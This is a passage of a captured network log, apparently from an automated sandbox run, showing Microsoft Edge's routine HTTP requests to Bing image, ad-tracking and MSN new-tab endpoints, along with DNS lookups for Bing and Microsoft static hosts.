sec-ms-gec-version: 1-133.0.3065.69
x-client-data: eyIxIjoiMCIsIjIiOiIwIiwiMyI6IjAiLCI0IjoiNTI1OTQxMTIwODk0MjAwMzY1OSIsIjYiOiJzdGFibGUiLCI5IjoiZGVza3RvcCJ9
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
sec-fetch-storage-access: active
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: MUID=1BCC9635343F60E02399838B3518610E
priority: i

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 72173
cache-control: public, max-age=2573849
date: Sat, 29 Mar 2025 01:30:36 GMT
x-cache: TCP_HIT from a92-122-54-60.deploy.akamaitechnologies.com (AkamaiGHost/22.0.0.1-318443691900e5d3d78f5dd48f596007) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.3c367a5c.1743211836.2efb01e
x-check-cacheable: YES
GET

https://th.bing.com/th?id=ORMS.78362a5711e9b19a5c5c6aa22aa6965b&pid=Wdp&w=612&h=304&qlt=90&c=1&rs=1&dpr=1&p=0

msedge.exe

Remote address:

95.101.143.219:443

Request

GET /th?id=ORMS.78362a5711e9b19a5c5c6aa22aa6965b&pid=Wdp&w=612&h=304&qlt=90&c=1&rs=1&dpr=1&p=0 HTTP/2.0
host: th.bing.com
sec-ch-ua-platform: "Windows"
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
sec-ch-ua: "Not(A:Brand";v="99", "Microsoft Edge";v="133", "Chromium";v="133"
dnt: 1
sec-ch-ua-mobile: ?0
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-edge-shopping-flag: 0
sec-ms-gec: 87D8E2F0684282DF6DE350AC7863058B54E0BD2F3A683830CF6A57A64DC4065D
sec-ms-gec-version: 1-133.0.3065.69
x-client-data: eyIxIjoiMCIsIjIiOiIwIiwiMyI6IjAiLCI0IjoiNTI1OTQxMTIwODk0MjAwMzY1OSIsIjYiOiJzdGFibGUiLCI5IjoiZGVza3RvcCJ9
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
sec-fetch-storage-access: active
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: MUID=1BCC9635343F60E02399838B3518610E
priority: i

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 7696
cache-control: public, max-age=2532696
date: Sat, 29 Mar 2025 01:30:36 GMT
x-cache: TCP_MEM_HIT from a92-122-54-60.deploy.akamaitechnologies.com (AkamaiGHost/22.0.0.1-318443691900e5d3d78f5dd48f596007) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.3c367a5c.1743211836.2efb01b
x-check-cacheable: YES
GET

https://th.bing.com/th?id=ORMS.7c3e460e44874b46826c6744d5f7f7c4&pid=Wdp&w=612&h=304&qlt=90&c=1&rs=1&dpr=1&p=0

msedge.exe

Remote address:

95.101.143.219:443

Request

GET /th?id=ORMS.7c3e460e44874b46826c6744d5f7f7c4&pid=Wdp&w=612&h=304&qlt=90&c=1&rs=1&dpr=1&p=0 HTTP/2.0
host: th.bing.com
sec-ch-ua-platform: "Windows"
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
sec-ch-ua: "Not(A:Brand";v="99", "Microsoft Edge";v="133", "Chromium";v="133"
dnt: 1
sec-ch-ua-mobile: ?0
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-edge-shopping-flag: 0
sec-ms-gec: 87D8E2F0684282DF6DE350AC7863058B54E0BD2F3A683830CF6A57A64DC4065D
sec-ms-gec-version: 1-133.0.3065.69
x-client-data: eyIxIjoiMCIsIjIiOiIwIiwiMyI6IjAiLCI0IjoiNTI1OTQxMTIwODk0MjAwMzY1OSIsIjYiOiJzdGFibGUiLCI5IjoiZGVza3RvcCJ9
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
sec-fetch-storage-access: active
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: MUID=1BCC9635343F60E02399838B3518610E
priority: i

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 35215
cache-control: public, max-age=649521
date: Sat, 29 Mar 2025 01:30:36 GMT
x-cache: TCP_MEM_HIT from a92-122-54-60.deploy.akamaitechnologies.com (AkamaiGHost/22.0.0.1-318443691900e5d3d78f5dd48f596007) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.3c367a5c.1743211836.2efb01d
x-check-cacheable: YES
GET

https://www.bing.com/api/v1/mediation/tracking?adUnit=366128&auId=b29e91d5-661e-44ce-8e41-efb0ff7ec86c&bidId=15000&bidderId=4&cmExpId=LV3&impId=2&oAdUnit=366128&publisherId=17160724&rId=b3acb661-8e41-49d4-befd-940da5dba5fd&rlink=https%3A%2F%2Fwww.bing.com%2Faes%2Fc.gif%3FDI%3D0%26DIS%3DSB_15000-1%3F%26RG%3D524b78902f98498caa1deb9cee31abfd%26SNR%3D1%26GV%3D2%26med%3D10&rtype=miFeedbackURL&tagId=edgechrntp-peekriver-2&trafficGroup=zfa_hx_zretr_4&trafficSubGroup=ego

msedge.exe

Remote address:

95.101.143.219:443

Request

GET /api/v1/mediation/tracking?adUnit=366128&auId=b29e91d5-661e-44ce-8e41-efb0ff7ec86c&bidId=15000&bidderId=4&cmExpId=LV3&impId=2&oAdUnit=366128&publisherId=17160724&rId=b3acb661-8e41-49d4-befd-940da5dba5fd&rlink=https%3A%2F%2Fwww.bing.com%2Faes%2Fc.gif%3FDI%3D0%26DIS%3DSB_15000-1%3F%26RG%3D524b78902f98498caa1deb9cee31abfd%26SNR%3D1%26GV%3D2%26med%3D10&rtype=miFeedbackURL&tagId=edgechrntp-peekriver-2&trafficGroup=zfa_hx_zretr_4&trafficSubGroup=ego HTTP/2.0
host: www.bing.com
sec-ch-ua-platform: "Windows"
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
sec-ch-ua: "Not(A:Brand";v="99", "Microsoft Edge";v="133", "Chromium";v="133"
dnt: 1
sec-ch-ua-mobile: ?0
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-edge-shopping-flag: 0
sec-ms-gec: 87D8E2F0684282DF6DE350AC7863058B54E0BD2F3A683830CF6A57A64DC4065D
sec-ms-gec-version: 1-133.0.3065.69
x-client-data: eyIxIjoiMCIsIjIiOiIwIiwiMyI6IjAiLCI0IjoiNTI1OTQxMTIwODk0MjAwMzY1OSIsIjYiOiJzdGFibGUiLCI5IjoiZGVza3RvcCJ9
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
sec-fetch-storage-access: active
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br, zsdch, zstd
accept-language: en-US,en;q=0.9
cookie: MUID=1BCC9635343F60E02399838B3518610E
priority: i

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 26546
date: Sat, 29 Mar 2025 01:30:36 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.3c367a5c.1743211836.2efb08e
GET

https://www.bing.com/api/v1/mediation/tracking?adUnit=366128&auId=9befcc48-6741-4809-a908-6214786ea6db&bidId=15000&bidderId=4&cmExpId=LV3&impId=1&oAdUnit=366128&publisherId=17160724&rId=b3acb661-8e41-49d4-befd-940da5dba5fd&rlink=https%3A%2F%2Fwww.bing.com%2Faes%2Fc.gif%3FDI%3D0%26DIS%3DSB_15000-1%3F%26RG%3D33f5df1682b342a49c1c15df156c73ae%26SNR%3D1%26GV%3D2%26med%3D10&rtype=miFeedbackURL&tagId=edgechrntp-peekriver-1&trafficGroup=zfa_hx_zretr_4&trafficSubGroup=ego

msedge.exe

Remote address:

95.101.143.219:443

Request

GET /api/v1/mediation/tracking?adUnit=366128&auId=9befcc48-6741-4809-a908-6214786ea6db&bidId=15000&bidderId=4&cmExpId=LV3&impId=1&oAdUnit=366128&publisherId=17160724&rId=b3acb661-8e41-49d4-befd-940da5dba5fd&rlink=https%3A%2F%2Fwww.bing.com%2Faes%2Fc.gif%3FDI%3D0%26DIS%3DSB_15000-1%3F%26RG%3D33f5df1682b342a49c1c15df156c73ae%26SNR%3D1%26GV%3D2%26med%3D10&rtype=miFeedbackURL&tagId=edgechrntp-peekriver-1&trafficGroup=zfa_hx_zretr_4&trafficSubGroup=ego HTTP/2.0
host: www.bing.com
sec-ch-ua-platform: "Windows"
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
sec-ch-ua: "Not(A:Brand";v="99", "Microsoft Edge";v="133", "Chromium";v="133"
dnt: 1
sec-ch-ua-mobile: ?0
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-edge-shopping-flag: 0
sec-ms-gec: 87D8E2F0684282DF6DE350AC7863058B54E0BD2F3A683830CF6A57A64DC4065D
sec-ms-gec-version: 1-133.0.3065.69
x-client-data: eyIxIjoiMCIsIjIiOiIwIiwiMyI6IjAiLCI0IjoiNTI1OTQxMTIwODk0MjAwMzY1OSIsIjYiOiJzdGFibGUiLCI5IjoiZGVza3RvcCJ9
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
sec-fetch-storage-access: active
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br, zsdch, zstd
accept-language: en-US,en;q=0.9
cookie: MUID=1BCC9635343F60E02399838B3518610E
priority: i

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 16739
date: Sat, 29 Mar 2025 01:30:36 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.3c367a5c.1743211836.2efb08d
GET

https://www.bing.com/th?id=OADD2.8108985455534_19YIAXH2M3UNS6XXWS&pid=21.2&c=17&roil=0.0955&roit=0.1612&roir=1&roib=1&w=300&h=157&dynsize=1&qlt=90

msedge.exe

Remote address:

95.101.143.219:443

Request

GET /th?id=OADD2.8108985455534_19YIAXH2M3UNS6XXWS&pid=21.2&c=17&roil=0.0955&roit=0.1612&roir=1&roib=1&w=300&h=157&dynsize=1&qlt=90 HTTP/2.0
host: www.bing.com
sec-ch-ua-platform: "Windows"
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
sec-ch-ua: "Not(A:Brand";v="99", "Microsoft Edge";v="133", "Chromium";v="133"
dnt: 1
sec-ch-ua-mobile: ?0
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-edge-shopping-flag: 0
sec-ms-gec: 87D8E2F0684282DF6DE350AC7863058B54E0BD2F3A683830CF6A57A64DC4065D
sec-ms-gec-version: 1-133.0.3065.69
x-client-data: eyIxIjoiMCIsIjIiOiIwIiwiMyI6IjAiLCI0IjoiNTI1OTQxMTIwODk0MjAwMzY1OSIsIjYiOiJzdGFibGUiLCI5IjoiZGVza3RvcCJ9
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
sec-fetch-storage-access: active
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br, zsdch, zstd
accept-language: en-US,en;q=0.9
cookie: MUID=1BCC9635343F60E02399838B3518610E
priority: i

Response

HTTP/2.0 303

cache-control: no-cache, no-store, must-revalidate
pragma: no-cache
content-length: 152
content-type: text/html; charset=utf-8
expires: 0
location: https://www.bing.com/aes/c.gif?DI=0&DIS=SB_15000-1?&RG=524b78902f98498caa1deb9cee31abfd&SNR=1&GV=2&med=10
vary: Origin
strict-transport-security: max-age=31536000; includeSubDomains
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 51242A48F64E497ABC28A6370C0E2643 Ref B: LON04EDGE0916 Ref C: 2025-03-29T01:30:36Z
date: Sat, 29 Mar 2025 01:30:36 GMT
set-cookie: _EDGE_S=SID=3E152409EF1966CF0FDC31B7EEA26788; path=/; httponly; domain=bing.com
set-cookie: MUIDB=1BCC9635343F60E02399838B3518610E; path=/; httponly; expires=Thu, 23-Apr-2026 01:30:36 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.3c367a5c.1743211836.2efb086
GET

https://www.bing.com/th?id=OADD2.7215967937586_1ZFJXEHCIAGO5IZ0JQ&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=300&h=157&dynsize=1&qlt=90

msedge.exe

Remote address:

95.101.143.219:443

Request

GET /th?id=OADD2.7215967937586_1ZFJXEHCIAGO5IZ0JQ&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=300&h=157&dynsize=1&qlt=90 HTTP/2.0
host: www.bing.com
sec-ch-ua-platform: "Windows"
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
sec-ch-ua: "Not(A:Brand";v="99", "Microsoft Edge";v="133", "Chromium";v="133"
dnt: 1
sec-ch-ua-mobile: ?0
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-edge-shopping-flag: 0
sec-ms-gec: 87D8E2F0684282DF6DE350AC7863058B54E0BD2F3A683830CF6A57A64DC4065D
sec-ms-gec-version: 1-133.0.3065.69
x-client-data: eyIxIjoiMCIsIjIiOiIwIiwiMyI6IjAiLCI0IjoiNTI1OTQxMTIwODk0MjAwMzY1OSIsIjYiOiJzdGFibGUiLCI5IjoiZGVza3RvcCJ9
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
sec-fetch-storage-access: active
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br, zsdch, zstd
accept-language: en-US,en;q=0.9
cookie: MUID=1BCC9635343F60E02399838B3518610E
priority: i

Response

HTTP/2.0 303

cache-control: no-cache, no-store, must-revalidate
pragma: no-cache
content-length: 152
content-type: text/html; charset=utf-8
expires: 0
location: https://www.bing.com/aes/c.gif?DI=0&DIS=SB_15000-1?&RG=33f5df1682b342a49c1c15df156c73ae&SNR=1&GV=2&med=10
vary: Origin
strict-transport-security: max-age=31536000; includeSubDomains
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: DD05082CEFD64BAB8FAC9486E9E5B7CA Ref B: LON04EDGE0915 Ref C: 2025-03-29T01:30:36Z
date: Sat, 29 Mar 2025 01:30:36 GMT
set-cookie: _EDGE_S=SID=1014E1711E3D66AF1E9CF4CF1F8667A3; path=/; httponly; domain=bing.com
set-cookie: MUIDB=1BCC9635343F60E02399838B3518610E; path=/; httponly; expires=Thu, 23-Apr-2026 01:30:36 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.3c367a5c.1743211836.2efb08c
GET

https://www.bing.com/aes/c.gif?DI=0&DIS=SB_15000-1?&RG=524b78902f98498caa1deb9cee31abfd&SNR=1&GV=2&med=10

msedge.exe

Remote address:

95.101.143.219:443

Request

GET /aes/c.gif?DI=0&DIS=SB_15000-1?&RG=524b78902f98498caa1deb9cee31abfd&SNR=1&GV=2&med=10 HTTP/2.0
host: www.bing.com
sec-ch-ua-platform: "Windows"
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
sec-ch-ua: "Not(A:Brand";v="99", "Microsoft Edge";v="133", "Chromium";v="133"
dnt: 1
sec-ch-ua-mobile: ?0
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-edge-shopping-flag: 0
sec-ms-gec: 87D8E2F0684282DF6DE350AC7863058B54E0BD2F3A683830CF6A57A64DC4065D
sec-ms-gec-version: 1-133.0.3065.69
x-client-data: eyIxIjoiMCIsIjIiOiIwIiwiMyI6IjAiLCI0IjoiNTI1OTQxMTIwODk0MjAwMzY1OSIsIjYiOiJzdGFibGUiLCI5IjoiZGVza3RvcCJ9
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
sec-fetch-storage-access: active
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br, zsdch, zstd
accept-language: en-US,en;q=0.9
cookie: MUID=1BCC9635343F60E02399838B3518610E
priority: i

Response

HTTP/2.0 200

cache-control: private,no-store
pragma: no-cache
vary: Origin
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: A47F4495B6F44300B7340EFB59CD57A6 Ref B: LON04EDGE1110 Ref C: 2025-03-29T01:30:36Z
content-length: 0
date: Sat, 29 Mar 2025 01:30:36 GMT
set-cookie: _EDGE_S=SID=3F5A5700DAA26EA901E942BEDB426F80; path=/; httponly; domain=bing.com
set-cookie: MUIDB=1BCC9635343F60E02399838B3518610E; path=/; httponly; expires=Thu, 23-Apr-2026 01:30:36 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.3c367a5c.1743211836.2efb11c
GET

https://www.bing.com/aes/c.gif?DI=0&DIS=SB_15000-1?&RG=33f5df1682b342a49c1c15df156c73ae&SNR=1&GV=2&med=10

msedge.exe

Remote address:

95.101.143.219:443

Request

GET /aes/c.gif?DI=0&DIS=SB_15000-1?&RG=33f5df1682b342a49c1c15df156c73ae&SNR=1&GV=2&med=10 HTTP/2.0
host: www.bing.com
sec-ch-ua-platform: "Windows"
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
sec-ch-ua: "Not(A:Brand";v="99", "Microsoft Edge";v="133", "Chromium";v="133"
dnt: 1
sec-ch-ua-mobile: ?0
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-edge-shopping-flag: 0
sec-ms-gec: 87D8E2F0684282DF6DE350AC7863058B54E0BD2F3A683830CF6A57A64DC4065D
sec-ms-gec-version: 1-133.0.3065.69
x-client-data: eyIxIjoiMCIsIjIiOiIwIiwiMyI6IjAiLCI0IjoiNTI1OTQxMTIwODk0MjAwMzY1OSIsIjYiOiJzdGFibGUiLCI5IjoiZGVza3RvcCJ9
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
sec-fetch-storage-access: active
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br, zsdch, zstd
accept-language: en-US,en;q=0.9
cookie: MUID=1BCC9635343F60E02399838B3518610E
priority: i

Response

HTTP/2.0 200

cache-control: private,no-store
pragma: no-cache
vary: Origin
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: FA68F1ECCC284F19BFC3F6B55B94F2F2 Ref B: LON04EDGE0621 Ref C: 2025-03-29T01:30:36Z
content-length: 0
date: Sat, 29 Mar 2025 01:30:36 GMT
set-cookie: _EDGE_S=SID=3B353AFB2D6D61A8282B2F452C4A60DD; path=/; httponly; domain=bing.com
set-cookie: MUIDB=1BCC9635343F60E02399838B3518610E; path=/; httponly; expires=Thu, 23-Apr-2026 01:30:36 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.3c367a5c.1743211836.2efb123
DNS

r.bing.com

msedge.exe

Remote address:

8.8.8.8:53

Request

r.bing.com

IN A

Response

r.bing.com

IN CNAME

p-static.bing.trafficmanager.net

p-static.bing.trafficmanager.net

IN CNAME

r.bing.com.edgekey.net

r.bing.com.edgekey.net

IN CNAME

e86303.dscx.akamaiedge.net

e86303.dscx.akamaiedge.net

IN A

88.221.135.33

e86303.dscx.akamaiedge.net

IN A

88.221.135.27

e86303.dscx.akamaiedge.net

IN A

95.101.143.219

e86303.dscx.akamaiedge.net

IN A

88.221.135.25

e86303.dscx.akamaiedge.net

IN A

95.101.143.201

e86303.dscx.akamaiedge.net

IN A

88.221.135.34
DNS

r.bing.com

msedge.exe

Remote address:

8.8.8.8:53

Request

r.bing.com

IN Unknown

Response

r.bing.com

IN CNAME

p-static.bing.trafficmanager.net

p-static.bing.trafficmanager.net

IN CNAME

r.bing.com.edgekey.net

r.bing.com.edgekey.net

IN CNAME

e86303.dscx.akamaiedge.net
DNS

r.msftstatic.com

msedge.exe

Remote address:

8.8.8.8:53

Request

r.msftstatic.com

IN A

Response

r.msftstatic.com

IN CNAME

r-msftstatic-com.a-0016.a-msedge.net

r-msftstatic-com.a-0016.a-msedge.net

IN CNAME

a-0016.a-msedge.net

a-0016.a-msedge.net

IN A

204.79.197.219
DNS

r.msftstatic.com

msedge.exe

Remote address:

8.8.8.8:53

Request

r.msftstatic.com

IN Unknown

Response

r.msftstatic.com

IN CNAME

r-msftstatic-com.a-0016.a-msedge.net
GET

https://ntp.msn.com/edge/ntp?locale=en-US&title=New+tab&enableForceCache=true

msedge.exe

Remote address:

204.79.197.203:443

Request

GET /edge/ntp?locale=en-US&title=New+tab&enableForceCache=true HTTP/2.0
host: ntp.msn.com
sec-ch-ua-full-version-list: "Not(A:Brand";v="99.0.0.0", "Microsoft Edge";v="133.0.3065.69", "Chromium";v="133.0.6943.99"
sec-ch-ua-platform: "Windows"
device-memory: 8
sec-ch-ua: "Not(A:Brand";v="99", "Microsoft Edge";v="133", "Chromium";v="133"
sec-ch-dpr: 1
sec-ch-ua-model: ""
sec-ch-ua-mobile: ?0
sec-ch-ua-bitness: "64"
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "133.0.3065.69"
sec-ch-viewport-width: 1026
downlink: 10
sec-ch-viewport-height: 533
ect: 4g
sec-ch-prefers-color-scheme: light
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
dnt: 1
rtt: 100
sec-ch-ua-platform-version: "10.0.0"
accept: */*
sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"imageAndVideo","dsp":1,"en_widget_reg":false,"exp":["msAllowThemeInstallationFromChromeStore","msUndersideAutoOpenForMsnTopQuestion","msNurturingMetadataTemplate","msNurturingOnboardNTPToCE"],"feed_dis":"peek","layout":1,"quick_links_opt":1,"seen_new_dev_fre":false,"sel_feed_piv":"","show_greet":true,"vt_opened":false}
x-edge-shopping-flag: 0
sec-ms-gec: 87D8E2F0684282DF6DE350AC7863058B54E0BD2F3A683830CF6A57A64DC4065D
sec-ms-gec-version: 1-133.0.3065.69
x-client-data: eyIxIjoiMCIsIjIiOiIwIiwiMyI6IjAiLCI0IjoiNTI1OTQxMTIwODk0MjAwMzY1OSIsIjYiOiJzdGFibGUiLCI5IjoiZGVza3RvcCJ9
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/edge/ntp?locale=en-US&title=New%20tab&dsp=1&sp=Bing&startpage=1&PC=U531
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: _C_Auth=
cookie: pglt-edgeChromium-dhp=2083
cookie: sptmarket=en-US||gb|en-gb|en-gb|en||cf=8|RefA=583592B502F9469CBA059551F752EDAF.RefC=2025-03-29T01:30:33Z
cookie: USRLOC=
cookie: MUIDB=1BCC9635343F60E02399838B3518610E
cookie: _EDGE_V=1
cookie: MUID=1BCC9635343F60E02399838B3518610E
cookie: _EDGE_S=F=1&SID=1E62984E5275615728728DF0538A60A8
cookie: MicrosoftApplicationsTelemetryDeviceId=488a5944-4c3f-431a-ac6b-41d1858d4154
cookie: ai_session=lrWGEv3fnryRFDgzVS/otZ|1743211833393|1743211833393
cookie: OptanonConsent=isGpcEnabled=0&datestamp=Sat+Mar+29+2025+01%3A30%3A33+GMT%2B0000+(Coordinated+Universal+Time)&version=202408.1.0&browserGpcFlag=0&isIABGlobal=false&hosts=&landingPath=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531&groups=C0001%3A1%2CC0003%3A0%2CC0002%3A0%2CC0004%3A0%2CV2STACK42%3A0
cookie: sptmarket_restored=en-US||gb|en-gb|en-gb|en||cf=8|RefA=583592B502F9469CBA059551F752EDAF.RefC=2025-03-29T01:30:33Z
cookie: msnup=%7B%22cnex%22%3A%22no%22%7D
cookie: msaoptout=0
priority: u=1, i

Response

HTTP/2.0 200

cache-control: no-cache
content-length: 30627
content-type: application/javascript
content-encoding: gzip
content-md5: /V21P5VupSAxdNfdmr1D0A==
last-modified: Fri, 28 Mar 2025 19:41:48 GMT
etag: 0x8DD6E309433E4A4
vary: Origin
x-ms-request-id: c32df531-601e-0047-2a19-a0f20f000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
akamai-request-bc: [a=23.73.136.118,b=484626028,c=g,n=GB_EN_SLOUGH,o=20940]
alt-svc: quic=":443"; ma=93600; v="43"
server-timing: clientrtt; dur=0, clienttt; dur=1, origin; dur=0, cdntime; dur=1, wpo;dur=0,1s;dur=0
akamai-cache-status: Hit from child
akamai-server-ip: 23.73.136.118
akamai-request-id: 1ce2ce6c
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
service-worker-allowed: /
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1}
timing-allow-origin: *
akamai-grn: 0.76884917.1743211837.1ce2ce6c
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 34F985B3A70E4EBE9FD3B3A05680AE03 Ref B: LON04EDGE1013 Ref C: 2025-03-29T01:30:37Z
date: Sat, 29 Mar 2025 01:30:36 GMT
GET

https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=720&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true

msedge.exe

Remote address:

204.79.197.203:443

Request

